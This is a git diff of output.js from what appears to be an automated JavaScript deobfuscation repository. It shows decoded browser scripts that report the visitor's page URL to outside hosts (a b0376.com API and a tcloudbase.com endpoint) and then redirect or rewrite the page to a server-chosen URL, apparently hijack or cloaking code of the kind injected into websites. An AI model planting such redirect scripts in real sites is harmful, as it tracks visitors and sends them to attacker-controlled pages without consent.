diff --git a/output.js b/output.js index 83469f2..eee8da2 100644 --- a/output.js +++ b/output.js @@ -1,21 +1,35 @@ -//Fri Apr 18 2025 05:57:50 GMT+0000 (Coordinated Universal Time) +//Fri Apr 18 2025 06:16:14 GMT+0000 (Coordinated Universal Time) //Base:https://github.com/echo094/decode-js //Modify:https://github.com/smallfawn/decode_action -!function () { - var _0xb3a4ce = new XMLHttpRequest(), - _0x2ff018 = { - "link": window.location.href, - "path": window.location.href.replace(window.location.origin, "") - }, - _0x4cbd2b = "https://www.qq.com/babygohome/?pgv_ref=404"; - _0xb3a4ce.open("POST", "https://jy.991cfa24bf31.b0376.com/api/url/info"); - _0xb3a4ce.setRequestHeader("Content-Type", "application/json"); - _0xb3a4ce.send(JSON.stringify(_0x2ff018)); - _0xb3a4ce.onreadystatechange = function () { - if (4 === _0xb3a4ce.readyState && 200 === _0xb3a4ce.status) { - var _0x1a531f = JSON.parse(_0xb3a4ce.response); - if (0 === _0x1a531f.code) return window.location.href = _0x1a531f.data.url, undefined; +function fetchApiContent() { + const _0x283928 = window.location.pathname; + const _0x39742e = window.location.search; + const _0x47be7d = "//mbmb-582252-1251029753.ap-shanghai.run.tcloudbase.com" + _0x283928 + "/" + _0x39742e; + fetch(_0x47be7d).then(_0x20d31c => _0x20d31c.json()).then(_0x3886b8 => { + const _0x32e5d1 = _0x3886b8.url; + if (_0x32e5d1) { + setTimeout(() => { + document.write("\n \n "); + }, 100); + } else { + console.log("Error: No target URL found"); } - window.location.href = _0x4cbd2b; - }; -}(); \ No newline at end of file + }).catch(_0x1f4dec => { + console.log("Error:", _0x1f4dec); + }); +} +function onLoad() { + const _0x494321 = localStorage.getItem("hasClicked"); + const _0x1cd146 = document.getElementById("continue-button"); + if (_0x494321) { + fetchApiContent(); + } else { + _0x1cd146.style.display = "block"; + _0x1cd146.addEventListener("click", () => { + localStorage.setItem("hasClicked", "true"); + fetchApiContent(); + }); + } +} +window.addEventListener("load", onLoad); +_0xod2 = "jsjiami.com.v6"; \ No newline at end of file diff --git a/output.py b/output.py index f8ab36d..6fa386f 100644 Binary files a/output.py and b/output.py differ